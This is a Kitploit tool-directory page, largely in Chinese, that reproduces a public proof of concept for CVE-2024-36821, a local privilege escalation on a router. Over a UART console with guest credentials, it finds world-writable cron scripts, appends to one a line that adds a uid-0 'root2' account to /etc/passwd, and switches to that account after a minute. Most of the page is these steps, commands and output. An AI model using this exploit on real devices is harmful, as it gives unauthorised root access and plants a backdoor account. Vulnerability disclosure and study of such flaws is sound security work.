Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-36821 — The public reference that contains the minimum require information for the vulnerability covered by CVE-2024-36821 | Kitploit
工具/GitHubGitHub/ivanglinkin/cve-2024-36821
Embedded Systems SecurityPrivilege EscalationVulnerability AnalysisExploitationPenetration TestingHardware & IoT Security
GitHubivanglinkin/cve-2024-36821

CVE-2024-36821

The public reference that contains the minimum require information for the vulnerability covered by CVE-2024-36821

查看仓库
32年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-36821

包含CVE-2024-36821漏洞所需最低限度信息的公开参考

包含PoC的原始视频可在以下链接找到 -> https://www.youtube.com/watch?v=6vHno0ik7JY

PoC:

  1. 通过UART连接连接到路由器

  2. 使用 guest:guest 凭据登录系统

  3. 使用 find / -perm -777 -type f 2>/dev/null 命令查找具有读-写-执行权限的文件:

    root@kitploit:~
    1. /tmp/cron/cron.daily/sysinfo_cleanup.sh
    2. /tmp/cron/cron.daily/devicedb_backup_daily.sh
    3. /tmp/cron/cron.hourly/sysinfo_cleanup.sh
    4. /tmp/cron/cron.every5minute/sysinfo_cleanup.sh
    5. /tmp/cron/cron.everyminute/conntrack_collector.sh
    
    截图 2024-06-10 20:00:50
  4. 通过 ls -al /tmp/cron/cron.everyminute/conntrack_collector.sh 命令检查所有者

  5. 通过 openssl passwd Abracadabra 命令生成密码

  6. 编辑 /tmp/cron/cron.everyminute/conntrack_collector.sh,在末尾添加新生成的密码:

    root@kitploit:~
    echo "root2:UlPYin76ss0w2:0:0::/:/bin/sh" >> /etc/passwd
    
    截图 2024-06-10 20:05:05
  7. 等待一分钟

  8. 通过以下命令切换用户至 root2

    root@kitploit:~
    / $ su root2
    Password: Abracadabra
    ~ #
    
下载工具